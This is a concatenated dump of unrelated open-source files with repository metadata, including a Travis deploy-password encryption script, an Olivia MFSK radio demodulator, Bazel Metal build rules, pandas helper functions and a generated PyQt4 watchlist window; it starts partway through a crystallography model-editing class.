self.xray_structure.apply_rigid_body_shift(
rot = rot_obj.rot_mat().as_mat3(),
trans = trans,
selection = selection.indices)
def _process_occupancies(self):
def check_if_already_modified():
if(self.top_selection): return
if (self._occupancies_modified):
raise Sorry("Can't modify occupancies (already modified).")
else:
self._occupancies_modified = True
for occ in self.params.occupancies:
if(occ.atom_selection is None):
selection = self.top_selection
else:
asc = self.pdb_hierarchy.atom_selection_cache(
special_position_settings=crystal.special_position_settings(
crystal_symmetry = self.crystal_symmetry))
sel = asc.selection(occ.atom_selection)
selection = flex.smart_selection(flags=sel)
if(occ.randomize):
self._print_action(
text = "Randomizing occupancies",
selection = selection)
check_if_already_modified()
self.xray_structure.shake_occupancies(selection=selection.flags)
if(occ.set is not None):
self._print_action(
text = "Setting occupancies to: %8.3f"%occ.set, selection = selection)
check_if_already_modified()
self.xray_structure.set_occupancies(
value = occ.set,
selection = selection.flags)
def _rotate_about_axis(self):
raap = self.params.rotate_about_axis
sites_cart = self.xray_structure.sites_cart()
if([raap.axis, raap.atom_selection, raap.angle].count(None)==0):
axis = []
try:
for a in raap.axis.split():
axis.append(float(a))
except Exception:
asc = self.pdb_hierarchy.atom_selection_cache()
sel = asc.selection(raap.axis)
axis = [i for i in sites_cart.select(sel).as_double()]
if(len(axis)!=6):
raise Sorry("Bad selection rotate_about_axis.axis: %s"%str(raap.axis))
p1 = scitbx.matrix.col(axis[:3])
p2 = scitbx.matrix.col(axis[3:])
raa = p1.rt_for_rotation_around_axis_through(
point=p2, angle=raap.angle, deg=True)
asc = self.pdb_hierarchy.atom_selection_cache()
sel = asc.selection(raap.atom_selection)
if(sel.count(True)==0):
raise Sorry(
"Empty selection rotate_about_axis.selection: %s"%str(raap.atom_selection))
sites_cart_rotated = raa * sites_cart.select(sel)
self.xray_structure.set_sites_cart(
sites_cart.set_selected(sel, sites_cart_rotated))
def _neutralize_scatterers(self):
if self.params.neutralize_scatterers:
self.model.neutralize_scatterers()
def get_results(self):
return group_args(
model = self.model,
# pdb_hierarchy = self.pdb_hierarchy,
# crystal_symmetry = self.crystal_symmetry,
)
| 37.725689
| 171
| 0.699111
|
11072bc808e03b267b82f207213b9bb3e6ee2728
| 3,757
|
py
|
Python
|
travis_pypi_setup.py
|
takeontom/PyLuxafor
|
38f4107226e3ae0c71a7d3291a493be4d5d612e1
|
[
"MIT"
] | 8
|
2018-04-06T13:35:04.000Z
|
2020-12-14T19:27:44.000Z
|
travis_pypi_setup.py
|
takeontom/PyLuxafor
|
38f4107226e3ae0c71a7d3291a493be4d5d612e1
|
[
"MIT"
] | 380
|
2016-12-14T22:08:42.000Z
|
2022-03-28T09:03:19.000Z
|
travis_pypi_setup.py
|
takeontom/PyLuxafor
|
38f4107226e3ae0c71a7d3291a493be4d5d612e1
|
[
"MIT"
] | 7
|
2017-06-01T19:35:35.000Z
|
2020-06-12T21:39:45.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Update encrypted deploy password in Travis config file
"""
from __future__ import print_function
import base64
import json
import os
from getpass import getpass
import yaml
from cryptography.hazmat.primitives.serialization import load_pem_public_key
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives.asymmetric.padding import PKCS1v15
try:
from urllib import urlopen
except:
from urllib.request import urlopen
GITHUB_REPO = 'takeontom/pyluxafor'
TRAVIS_CONFIG_FILE = os.path.join(
os.path.dirname(os.path.abspath(__file__)), '.travis.yml')
def load_key(pubkey):
"""Load public RSA key, with work-around for keys using
incorrect header/footer format.
Read more about RSA encryption with cryptography:
https://cryptography.io/latest/hazmat/primitives/asymmetric/rsa/
"""
try:
return load_pem_public_key(pubkey.encode(), default_backend())
except ValueError:
# workaround for https://github.com/travis-ci/travis-api/issues/196
pubkey = pubkey.replace('BEGIN RSA', 'BEGIN').replace('END RSA', 'END')
return load_pem_public_key(pubkey.encode(), default_backend())
def encrypt(pubkey, password):
"""Encrypt password using given RSA public key and encode it with base64.
The encrypted password can only be decrypted by someone with the
private key (in this case, only Travis).
"""
key = load_key(pubkey)
encrypted_password = key.encrypt(password, PKCS1v15())
return base64.b64encode(encrypted_password)
def fetch_public_key(repo):
"""Download RSA public key Travis will use for this repo.
Travis API docs: http://docs.travis-ci.com/api/#repository-keys
"""
keyurl = 'https://api.travis-ci.org/repos/{0}/key'.format(repo)
data = json.loads(urlopen(keyurl).read().decode())
if 'key' not in data:
errmsg = "Could not find public key for repo: {}.\n".format(repo)
errmsg += "Have you already added your GitHub repo to Travis?"
raise ValueError(errmsg)
return data['key']
def prepend_line(filepath, line):
"""Rewrite a file adding a line to its beginning.
"""
with open(filepath) as f:
lines = f.readlines()
lines.insert(0, line)
with open(filepath, 'w') as f:
f.writelines(lines)
def load_yaml_config(filepath):
with open(filepath) as f:
        return yaml.safe_load(f)
def save_yaml_config(filepath, config):
with open(filepath, 'w') as f:
yaml.dump(config, f, default_flow_style=False)
def update_travis_deploy_password(encrypted_password):
"""Update the deploy section of the .travis.yml file
to use the given encrypted password.
"""
config = load_yaml_config(TRAVIS_CONFIG_FILE)
config['deploy']['password'] = dict(secure=encrypted_password)
save_yaml_config(TRAVIS_CONFIG_FILE, config)
    line = ('# This file was autogenerated and will be overwritten'
' each time you run travis_pypi_setup.py\n')
prepend_line(TRAVIS_CONFIG_FILE, line)
def main(args):
public_key = fetch_public_key(args.repo)
password = args.password or getpass('PyPI password: ')
update_travis_deploy_password(encrypt(public_key, password.encode()))
print("Wrote encrypted password to .travis.yml -- you're ready to deploy")
if '__main__' == __name__:
import argparse
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument('--repo', default=GITHUB_REPO,
help='GitHub repo (default: %s)' % GITHUB_REPO)
parser.add_argument('--password',
help='PyPI password (will prompt if not provided)')
args = parser.parse_args()
main(args)
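# Example invocation (hypothetical values):
#   python travis_pypi_setup.py --repo takeontom/pyluxafor
# prompts for the PyPI password, encrypts it with the repo's Travis public key,
# and writes it under deploy -> password -> secure in .travis.yml.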
| 30.544715
| 79
| 0.700559
|
dd1dff33dd336c58f6616b4e5ccac9cf20b34866
| 193
|
py
|
Python
|
redis/commands/search/_util.py
|
barshaul/redis-py
|
bf3d21d1626297d55e43d79d75d1668d3d4dc111
|
[
"MIT"
] | 483
|
2021-10-11T22:11:32.000Z
|
2022-03-31T20:30:32.000Z
|
redis/commands/search/_util.py
|
barshaul/redis-py
|
bf3d21d1626297d55e43d79d75d1668d3d4dc111
|
[
"MIT"
] | 423
|
2021-10-13T09:07:29.000Z
|
2022-03-31T09:13:03.000Z
|
redis/commands/search/_util.py
|
barshaul/redis-py
|
bf3d21d1626297d55e43d79d75d1668d3d4dc111
|
[
"MIT"
] | 148
|
2021-10-19T09:43:51.000Z
|
2022-03-30T16:35:53.000Z
|
def to_string(s):
if isinstance(s, str):
return s
elif isinstance(s, bytes):
return s.decode("utf-8", "ignore")
else:
return s # Not a string we care about
| 24.125
| 46
| 0.57513
|
b1fc81413080b93b2a5e710dfe27fdd773f55449
| 497
|
py
|
Python
|
tests/test_airbnb_db.py
|
karthikramasamy/cmpe272-project
|
bd11184ecb2630c853f01c0af24e6be308837396
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_airbnb_db.py
|
karthikramasamy/cmpe272-project
|
bd11184ecb2630c853f01c0af24e6be308837396
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_airbnb_db.py
|
karthikramasamy/cmpe272-project
|
bd11184ecb2630c853f01c0af24e6be308837396
|
[
"BSD-3-Clause"
] | null | null | null |
import pytest
from airbnb.airbnb_db import get_db
def test_get_close_db(app):
with app.app_context():
db = get_db()
assert db is get_db()
def test_init_db_command(runner, monkeypatch):
class Recorder(object):
called = False
def fake_init_db():
Recorder.called = True
monkeypatch.setattr('airbnb.airbnb_db.init_db', fake_init_db)
result = runner.invoke(args=['init-db'])
assert 'Initialized' in result.output
assert Recorder.called
| 22.590909
| 65
| 0.688129
|
0417bc9d5029e303393e3da18d7de708a1d60567
| 288
|
py
|
Python
|
src/corpus/audible.py
|
tiefenauer/ip9
|
4d50ee288f8a00f64a6f4a7d80639d3dc89df4e8
|
[
"MIT"
] | 4
|
2019-06-02T02:56:38.000Z
|
2021-11-06T02:29:26.000Z
|
src/corpus/audible.py
|
tiefenauer/ip9
|
4d50ee288f8a00f64a6f4a7d80639d3dc89df4e8
|
[
"MIT"
] | null | null | null |
src/corpus/audible.py
|
tiefenauer/ip9
|
4d50ee288f8a00f64a6f4a7d80639d3dc89df4e8
|
[
"MIT"
] | null | null | null |
from abc import ABC, abstractmethod
class Audible(ABC):
"""
Base class for corpus objects that contain an audio signal
"""
@property
@abstractmethod
def audio(self):
return None
@property
@abstractmethod
def rate(self):
return None
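# Illustrative sketch (not part of the original corpus code): a minimal
# concrete subclass showing how the Audible interface could be satisfied.
class _ExampleAudible(Audible):
    def __init__(self, samples, sample_rate):
        self._samples = samples
        self._rate = sample_rate

    @property
    def audio(self):
        # the raw audio signal, e.g. a numpy array of samples
        return self._samples

    @property
    def rate(self):
        # sampling rate in Hz
        return self._rate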
| 16
| 62
| 0.628472
|
387f5f68773cea65dac2ac72a4ad9ff7b17ef7bb
| 388
|
py
|
Python
|
src/Python/02_Instrukcje_sterujace/Zad4.py
|
djeada/Nauka-programowania
|
b1eb6840c15b830acf552f0a0fc5cc692759152f
|
[
"MIT"
] | 3
|
2020-09-19T21:38:30.000Z
|
2022-03-30T11:02:26.000Z
|
src/Python/02_Instrukcje_sterujace/Zad4.py
|
djeada/Nauka-programowania
|
b1eb6840c15b830acf552f0a0fc5cc692759152f
|
[
"MIT"
] | null | null | null |
src/Python/02_Instrukcje_sterujace/Zad4.py
|
djeada/Nauka-programowania
|
b1eb6840c15b830acf552f0a0fc5cc692759152f
|
[
"MIT"
] | 1
|
2022-02-04T09:13:20.000Z
|
2022-02-04T09:13:20.000Z
|
"""
For two numbers read from input, print the larger one first, then the smaller one.
"""
if __name__ == "__main__":
print("podaj dwie liczby")
a = int(input())
b = int(input())
if a < b:
print(b)
print(a)
print(" druga liczba jest wieksza od pierwszej")
else:
print(a)
print(b)
print("druga liczba nie jest wieksza od pierwszej")
| 19.4
| 66
| 0.574742
|
e32ba67705619d662ba423da32ccb828f3111589
| 3,689
|
bzl
|
Python
|
apple/internal/resource_actions/metals.bzl
|
mccorkill1/rules_apple
|
8562971108c11931618a220731c335e9fab9fb49
|
[
"Apache-2.0"
] | null | null | null |
apple/internal/resource_actions/metals.bzl
|
mccorkill1/rules_apple
|
8562971108c11931618a220731c335e9fab9fb49
|
[
"Apache-2.0"
] | 1
|
2021-02-23T17:44:22.000Z
|
2021-02-23T17:44:22.000Z
|
apple/internal/resource_actions/metals.bzl
|
mccorkill1/rules_apple
|
8562971108c11931618a220731c335e9fab9fb49
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2020 The Bazel Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Metal related actions."""
load(
"@build_bazel_apple_support//lib:apple_support.bzl",
"apple_support",
)
load(
"@bazel_skylib//lib:paths.bzl",
"paths",
)
def _metal_apple_target_triple(platform_prerequisites):
"""Returns a Metal target triple string for an Apple platform.
Args:
platform_prerequisites: The target's platform_prerequisites.
Returns:
A target triple string describing the platform.
"""
platform = platform_prerequisites.apple_fragment.single_arch_platform
xcode_config = platform_prerequisites.xcode_version_config
target_os_version = xcode_config.minimum_os_for_platform_type(
platform.platform_type,
)
platform_string = str(platform.platform_type)
if platform_string == "macos":
platform_string = "macosx"
environment = "" if platform.is_device else "-simulator"
return "air64-apple-{platform}{version}{environment}".format(
environment = environment,
platform = platform_string,
version = target_os_version,
)
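    # Illustrative result (exact values depend on the configured platform and
    # minimum OS): an iOS simulator build with a 12.0 minimum OS would yield
    # "air64-apple-ios12.0-simulator", while a macOS build would yield e.g.
    # "air64-apple-macosx10.15".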
def compile_metals(*, actions, input_files, output_file, platform_prerequisites, **kwargs):
"""Creates actions that compile .metal files into a single .metallib file.
Args:
actions: The actions provider from `ctx.actions`.
platform_prerequisites: Struct containing information on the platform being targeted.
input_files: The input metal files.
output_file: The output metallib file.
**kwargs: Ignored
"""
air_files = []
target = _metal_apple_target_triple(platform_prerequisites)
if not input_files:
fail("Input .metal files can't be empty")
    # Compile each .metal file into its own .air file
for input_metal in input_files:
air_file = actions.declare_file(
paths.replace_extension(input_metal.basename, ".air"),
)
air_files.append(air_file)
args = actions.args()
args.add("metal")
args.add("-c")
args.add("-target", target)
args.add("-ffast-math")
args.add("-o", air_file)
args.add(input_metal)
apple_support.run(
actions = actions,
executable = "/usr/bin/xcrun",
inputs = [input_metal],
outputs = [air_file],
arguments = [args],
mnemonic = "MetalCompile",
apple_fragment = platform_prerequisites.apple_fragment,
xcode_config = platform_prerequisites.xcode_version_config,
)
# Compile .air files into a single .metallib file, which stores the Metal
# library
args = actions.args()
args.add("metallib")
args.add("-o", output_file)
args.add_all(air_files)
apple_support.run(
actions = actions,
executable = "/usr/bin/xcrun",
inputs = air_files,
outputs = [output_file],
arguments = [args],
mnemonic = "MetallibCompile",
apple_fragment = platform_prerequisites.apple_fragment,
xcode_config = platform_prerequisites.xcode_version_config,
)
| 33.234234
| 93
| 0.674709
|
2a71b6466ed1df0c69d0c7d2fcaa420eb97582c0
| 54
|
py
|
Python
|
src/model/components/__init__.py
|
atick-faisal/PyTorch-Starter
|
031f8e4f2a8b22ba4254ce0730598791d0b1673d
|
[
"MIT"
] | null | null | null |
src/model/components/__init__.py
|
atick-faisal/PyTorch-Starter
|
031f8e4f2a8b22ba4254ce0730598791d0b1673d
|
[
"MIT"
] | null | null | null |
src/model/components/__init__.py
|
atick-faisal/PyTorch-Starter
|
031f8e4f2a8b22ba4254ce0730598791d0b1673d
|
[
"MIT"
] | null | null | null |
from .conv import ConvBlock
from .mlp import MLPBlock
| 18
| 27
| 0.814815
|
233d14c25fe7a49f70a3e1b8f8d85884cd64588f
| 302
|
py
|
Python
|
bash.py
|
amirelemam/USP
|
a8ea2f6bd665b806299f61d05347af9895e3b359
|
[
"MIT"
] | 1
|
2020-03-29T02:35:08.000Z
|
2020-03-29T02:35:08.000Z
|
bash.py
|
amirelemam/Spammer-Detection-and-Sentiment-Analysis
|
a8ea2f6bd665b806299f61d05347af9895e3b359
|
[
"MIT"
] | 10
|
2016-11-30T09:40:31.000Z
|
2016-11-30T09:52:59.000Z
|
bash.py
|
amirelemam/Spammer-Detection-and-Sentiment-Analysis
|
a8ea2f6bd665b806299f61d05347af9895e3b359
|
[
"MIT"
] | null | null | null |
import subprocess
files = ["500k-1M", "1M-1.5M", "1.5M-2M", "2M-2-5M", "2.5M-3M",
"3M-3-5M", "3.5M-4M", "4M-4-5M", "4.5M-5M","5M-5-5M", "5.5M-6M",
"6M-6-5M", "6.5M-7M", "7M-7-5M"]
for item in files:
subprocess.call(["python", "spammer_detection_and_sentiment_analysis.py", item])
| 33.555556
| 84
| 0.569536
|
2e66d409e4c62138c6d10e4e77862ad3d2f8018c
| 5,769
|
py
|
Python
|
olivia-rx.py
|
blikkentrommel/olivia-python
|
24919599960ada89879a4608d8704e1e1480c860
|
[
"MIT"
] | null | null | null |
olivia-rx.py
|
blikkentrommel/olivia-python
|
24919599960ada89879a4608d8704e1e1480c860
|
[
"MIT"
] | 1
|
2022-01-12T02:31:37.000Z
|
2022-01-12T08:14:50.000Z
|
olivia-rx.py
|
blikkentrommel/olivia-python
|
24919599960ada89879a4608d8704e1e1480c860
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python3
# -*- coding: utf-8 -*-
"""
OLIVIA MFSK Demodulator
@author: Federico Santandrea
Source code is lightly commented for clarity.
Please read the document to better understand the various processes.
"""
# Libraries
import os, sys
import numpy as np
import sounddevice as sd
from numpy.fft import fft
# Hardcoded parameters
DEFAULT_PARAMS = "32/1000@1500"
SAMPLE_RATE = 8000
BLOCK_THRESHOLD = 24
# Global parameters
'''
Input:
- CENTER_FREQUENCY, SYMBOLS (# of tones), BANDWIDTH
Computed:
- spb: number of bits for a symbol
- fsep: frequency separation between tones, in Hz (also = baud rate)
- wlen: time separation between tones, in samples
'''
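# Worked example for DEFAULT_PARAMS = "32/1000@1500" at SAMPLE_RATE = 8000:
# spb = log2(32) = 5 bits per symbol, fsep = 1000/32 = 31.25 Hz (= baud rate),
# wlen = ceil(8000/31.25) = 256 samples per symbol.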
# Global objects
'''
- buf: audio sample input buffer
- sin: sounddevice InputStream for sample acquisition
'''
def __main__():
'''
Main program flow.
'''
welcomeAndSetup()
initSound()
syms = []
while True:
# Fetch new samples
updateBuffer()
sym = detectSymbol()
syms.append(sym)
if len(syms) == 64:
# Enough symbols to decode a block
if decodeAndPrintBlock(syms):
# Block decoded successfully, waiting for a new one
syms = []
else:
# Probably not a complete block, try rolling
syms = syms[1:]
#
def welcomeAndSetup():
'''
Decodes command line parameters and prints a welcome message.
'''
global CENTER_FREQUENCY, SYMBOLS, BANDWIDTH
global spb, fsep, wlen, slen
if len(sys.argv) == 1:
params = DEFAULT_PARAMS
elif len(sys.argv) == 2:
params = sys.argv[1]
else:
printUsageAndQuit()
try:
CENTER_FREQUENCY = int(params.split("@")[1])
SYMBOLS = int(params.split("/")[0])
BANDWIDTH = int(params.split("@")[0].split("/")[1])
spb = int(np.log2(SYMBOLS))
fsep = BANDWIDTH/SYMBOLS # = baud
wlen = int(np.ceil(SAMPLE_RATE/fsep))
except:
printUsageAndQuit()
if os.isatty(0):
print("*** Olivia demodulator ***")
print("(C) 2020 Federico Santandrea")
print("federico.santandrea@studio.unibo.it")
print()
print("Starting Olivia demodulator at center " + str(CENTER_FREQUENCY) +
"Hz, using " + str(SYMBOLS) + " tones over " + str(BANDWIDTH) + "Hz")
print()
def printUsageAndQuit():
'''
Prints usage help if needed.
'''
print("usage: " + sys.argv[0] + " [syms/bandwidth@centerfrequency]")
print("Example (default): " + sys.argv[0] + " " + DEFAULT_PARAMS)
quit()
def initSound():
'''
Prepares global InputStream for sample acquisition.
'''
global sin, buf
sin = sd.InputStream(samplerate=SAMPLE_RATE, blocksize=wlen,
#channels=2, device=2, # stereo mix
dtype=np.float32)
sin.start()
buf= np.zeros(wlen)
def updateBuffer():
'''
Acquires a new wlen-ful of samples from audio device.
'''
global buf
(samples, of) = sin.read(wlen)
buf = samples[:,0] # consider only one channel
def detectSymbol():
'''
Applies Fourier transform to audio buffer to detect
symbol corresponding to sampled tone.
Returns
-------
int
Most likely symbol number.
'''
spectrum = np.abs(fft(buf))
ix = CENTER_FREQUENCY - BANDWIDTH/2 + fsep/2
measures = np.zeros(SYMBOLS)
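    # The wlen-point FFT has a bin spacing of SAMPLE_RATE/wlen Hz, which by
    # construction is (approximately) fsep, so int(ix * wlen / SAMPLE_RATE)
    # maps a tone frequency in Hz to its FFT bin index.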
for i in range(0, SYMBOLS):
ix += fsep
measures[i] = spectrum[int(ix * wlen / SAMPLE_RATE)]
mix = np.argmax(measures)
return degray(mix)
def decodeAndPrintBlock(syms):
'''
Decodes a full block of 64 symbols, then prints it
to standard output.
'''
w = np.zeros((spb, 64))
# key = 0xE257E6D0291574EC
key = np.flip(np.array(
[1, 1, 1, 0, 0, 0, 1, 0,
0, 1, 0, 1, 0, 1, 1, 1,
1, 1, 1, 0, 0, 1, 1, 0,
1, 1, 0, 1, 0, 0, 0, 0,
0, 0, 1, 0, 1, 0, 0, 1,
0, 0, 0, 1, 0, 1, 0, 1,
0, 1, 1, 1, 0, 1, 0, 0,
1, 1, 1, 0, 1, 1, 0, 0]))
output = ""
doubt = 0
for i in range(0, spb):
for j in range(0, 64):
bit = (syms[j] >> ((i+j) % spb)) & 1
if bit == 1:
w[i,j] = -1
else:
w[i,j] = 1
w[i,:] = w[i,:] * (-2*np.roll(key, -13*i)+1)
w[i,:] = fwht(w[i,:])
c = np.argmax(np.abs(w[i,:]))
if abs(w[i,c]) < BLOCK_THRESHOLD:
doubt += 1
if w[i,c] < 0:
c = c + 64
if c != 0:
output += chr(c)
if doubt == 0:
print(output, end="", flush=True)
return True
else:
return False
#
def fwht(data):
'''
Fast Walsh-Hadamard transform.
'''
step = 1
while step < len(data):
for ptr in range(0, len(data), 2*step):
for ptr2 in range(ptr, step+ptr):
bit1 = data[ptr2]
bit2 = data[ptr2+step]
newbit1 = bit2
newbit1 = newbit1 + bit1
newbit2 = bit2
newbit2 = newbit2 - bit1
data[ptr2] = newbit1
data[ptr2+step] = newbit2
step *= 2
return data
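# For example, fwht([1, 0, 1, 0]) returns [2, -2, 0, 0]: an unnormalized,
# in-place transform with the sign convention of the butterfly above.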
def degray(n):
mask = n
while mask != 0:
mask >>= 1
n ^= mask
return n
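# For example, degray(0b11) == 2: converts a Gray-coded tone index back to
# its binary symbol value.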
#
#
__main__()
| 24.866379
| 84
| 0.500953
|
436e627f321a4c2846704de7f7d244c01207706b
| 2,242
|
py
|
Python
|
Z_ALL_FILE/Py1/tstststs.py
|
omikabir/omEngin
|
b8c04a5c2c12ffc3d0b67c2ceba9e5741d3f9195
|
[
"Apache-2.0"
] | null | null | null |
Z_ALL_FILE/Py1/tstststs.py
|
omikabir/omEngin
|
b8c04a5c2c12ffc3d0b67c2ceba9e5741d3f9195
|
[
"Apache-2.0"
] | null | null | null |
Z_ALL_FILE/Py1/tstststs.py
|
omikabir/omEngin
|
b8c04a5c2c12ffc3d0b67c2ceba9e5741d3f9195
|
[
"Apache-2.0"
] | 1
|
2021-04-29T21:46:02.000Z
|
2021-04-29T21:46:02.000Z
|
import pandas as pd
def countif(col_as_range,criteria):
    # col_as_range can be a list or a dataframe series
if isinstance(col_as_range,list):
count = col_as_range.count(criteria)
return count
elif isinstance(col_as_range, pd.core.series.Series):
col_range_list = col_as_range.values.tolist()
count = col_range_list.count(criteria)
return count
else:
return "none"
# Example call: print(countif(df['Colname'], "value_to_check"))
# We call the countif function above in a loop over the dataframe and store
# the result in a new column, as follows.
def match(srcstr,list_as_range,start_from = False):
try:
if start_from == False or start_from == "First":
if isinstance(list_as_range,list):
indices = [i for i, x in enumerate(list_as_range) if x == srcstr]
return indices[0]
elif isinstance(list_as_range, pd.core.series.Series):
col_range_list = list_as_range.values.tolist()
indices = [i for i, x in enumerate(col_range_list) if x == srcstr]
return indices[0]
else:
return "none"
elif start_from == "Last":
if isinstance(list_as_range,list):
indices = [i for i, x in enumerate(list_as_range) if x == srcstr]
ln = len(indices)
return indices[ln-1]
elif isinstance(list_as_range, pd.core.series.Series):
col_range_list = list_as_range.values.tolist()
indices = [i for i, x in enumerate(col_range_list) if x == srcstr]
ln = len(indices)
return indices[ln-1]
else:
return "none"
except:
return "NA"
df = pd.DataFrame({
'column_1': ['g', 't', 'n', 'w', 'n', 'g']
})
print(match('n',df['column_1'],"Last"))
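# expected output: 4 (the last index of 'n' in ['g', 't', 'n', 'w', 'n', 'g'])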
df = df.assign(new_column = "NA")
list_as_range = df['column_1'].values.tolist() #column_1 is the column name (can be any column)
for i in range(len(df)):
cell_value = df.loc[i,'column_1'] #column_1 is the column name (can be any column)
df.loc[i,'new_column'] = countif(list_as_range, cell_value) #calling above functions
#print(df)
| 39.333333
| 113
| 0.607493
|
3ae2122a5cdb4a6a1e0b7c1ad6b50f14236eb3d4
| 10,998
|
py
|
Python
|
exampleWatchlistUI.py
|
laurencejbelliott/groupB4OMDB_API
|
e5d79cbe17b50ceeb17bcd08d1107ac694d835ac
|
[
"MIT"
] | 1
|
2018-11-25T12:29:46.000Z
|
2018-11-25T12:29:46.000Z
|
exampleWatchlistUI.py
|
laurencejbelliott/groupB4OMDB_API
|
e5d79cbe17b50ceeb17bcd08d1107ac694d835ac
|
[
"MIT"
] | null | null | null |
exampleWatchlistUI.py
|
laurencejbelliott/groupB4OMDB_API
|
e5d79cbe17b50ceeb17bcd08d1107ac694d835ac
|
[
"MIT"
] | 1
|
2018-12-13T12:42:00.000Z
|
2018-12-13T12:42:00.000Z
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'exampleWatchlist.ui'
#
# Created by: PyQt4 UI code generator 4.11.4
#
# WARNING! All changes made in this file will be lost!
# This code is to be used as a reference for generating the watchlist
# window when a user loads their watchlist file
from PyQt4 import QtCore, QtGui
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
def _fromUtf8(s):
return s
try:
_encoding = QtGui.QApplication.UnicodeUTF8
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig, _encoding)
except AttributeError:
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig)
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName(_fromUtf8("MainWindow"))
MainWindow.resize(800, 600)
self.centralwidget = QtGui.QWidget(MainWindow)
self.centralwidget.setObjectName(_fromUtf8("centralwidget"))
self.horizontalLayoutWidget = QtGui.QWidget(self.centralwidget)
self.horizontalLayoutWidget.setGeometry(QtCore.QRect(-1, -1, 801, 551))
self.horizontalLayoutWidget.setObjectName(_fromUtf8("horizontalLayoutWidget"))
self.horizontalLayout_2 = QtGui.QHBoxLayout(self.horizontalLayoutWidget)
self.horizontalLayout_2.setObjectName(_fromUtf8("horizontalLayout_2"))
self.scrollArea = QtGui.QScrollArea(self.horizontalLayoutWidget)
self.scrollArea.setWidgetResizable(True)
self.scrollArea.setObjectName(_fromUtf8("scrollArea"))
self.scrollAreaWidgetContents = QtGui.QWidget()
self.scrollAreaWidgetContents.setGeometry(QtCore.QRect(0, 0, 130, 547))
self.scrollAreaWidgetContents.setObjectName(_fromUtf8("scrollAreaWidgetContents"))
self.verticalLayoutWidget = QtGui.QWidget(self.scrollAreaWidgetContents)
self.verticalLayoutWidget.setGeometry(QtCore.QRect(-1, -1, 131, 551))
self.verticalLayoutWidget.setObjectName(_fromUtf8("verticalLayoutWidget"))
self.verticalLayout_3 = QtGui.QVBoxLayout(self.verticalLayoutWidget)
self.verticalLayout_3.setObjectName(_fromUtf8("verticalLayout_3"))
self.pushButton = QtGui.QPushButton(self.verticalLayoutWidget)
self.pushButton.setObjectName(_fromUtf8("pushButton"))
self.verticalLayout_3.addWidget(self.pushButton)
self.pushButton_2 = QtGui.QPushButton(self.verticalLayoutWidget)
self.pushButton_2.setObjectName(_fromUtf8("pushButton_2"))
self.verticalLayout_3.addWidget(self.pushButton_2)
self.pushButton_3 = QtGui.QPushButton(self.verticalLayoutWidget)
self.pushButton_3.setObjectName(_fromUtf8("pushButton_3"))
self.verticalLayout_3.addWidget(self.pushButton_3)
self.pushButton_4 = QtGui.QPushButton(self.verticalLayoutWidget)
self.pushButton_4.setObjectName(_fromUtf8("pushButton_4"))
self.verticalLayout_3.addWidget(self.pushButton_4)
self.pushButton_5 = QtGui.QPushButton(self.verticalLayoutWidget)
self.pushButton_5.setObjectName(_fromUtf8("pushButton_5"))
self.verticalLayout_3.addWidget(self.pushButton_5)
self.pushButton_6 = QtGui.QPushButton(self.verticalLayoutWidget)
self.pushButton_6.setObjectName(_fromUtf8("pushButton_6"))
self.verticalLayout_3.addWidget(self.pushButton_6)
spacerItem = QtGui.QSpacerItem(20, 40, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Expanding)
self.verticalLayout_3.addItem(spacerItem)
self.scrollArea.setWidget(self.scrollAreaWidgetContents)
self.horizontalLayout_2.addWidget(self.scrollArea)
self.scrollArea_2 = QtGui.QScrollArea(self.horizontalLayoutWidget)
self.scrollArea_2.setWidgetResizable(True)
self.scrollArea_2.setObjectName(_fromUtf8("scrollArea_2"))
self.scrollAreaWidgetContents_3 = QtGui.QWidget()
self.scrollAreaWidgetContents_3.setGeometry(QtCore.QRect(0, 0, 659, 547))
self.scrollAreaWidgetContents_3.setObjectName(_fromUtf8("scrollAreaWidgetContents_3"))
self.verticalLayoutWidget_2 = QtGui.QWidget(self.scrollAreaWidgetContents_3)
self.verticalLayoutWidget_2.setGeometry(QtCore.QRect(-1, -1, 661, 551))
self.verticalLayoutWidget_2.setObjectName(_fromUtf8("verticalLayoutWidget_2"))
self.verticalLayout_4 = QtGui.QVBoxLayout(self.verticalLayoutWidget_2)
self.verticalLayout_4.setObjectName(_fromUtf8("verticalLayout_4"))
self.label = QtGui.QLabel(self.verticalLayoutWidget_2)
self.label.setObjectName(_fromUtf8("label"))
self.verticalLayout_4.addWidget(self.label)
self.label_2 = QtGui.QLabel(self.verticalLayoutWidget_2)
self.label_2.setObjectName(_fromUtf8("label_2"))
self.verticalLayout_4.addWidget(self.label_2)
self.label_3 = QtGui.QLabel(self.verticalLayoutWidget_2)
self.label_3.setObjectName(_fromUtf8("label_3"))
self.verticalLayout_4.addWidget(self.label_3)
self.label_4 = QtGui.QLabel(self.verticalLayoutWidget_2)
self.label_4.setObjectName(_fromUtf8("label_4"))
self.verticalLayout_4.addWidget(self.label_4)
self.label_5 = QtGui.QLabel(self.verticalLayoutWidget_2)
self.label_5.setObjectName(_fromUtf8("label_5"))
self.verticalLayout_4.addWidget(self.label_5)
self.label_6 = QtGui.QLabel(self.verticalLayoutWidget_2)
self.label_6.setObjectName(_fromUtf8("label_6"))
self.verticalLayout_4.addWidget(self.label_6)
spacerItem1 = QtGui.QSpacerItem(20, 40, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Expanding)
self.verticalLayout_4.addItem(spacerItem1)
self.scrollArea_2.setWidget(self.scrollAreaWidgetContents_3)
self.horizontalLayout_2.addWidget(self.scrollArea_2)
self.horizontalLayout_2.setStretch(0, 1)
self.horizontalLayout_2.setStretch(1, 5)
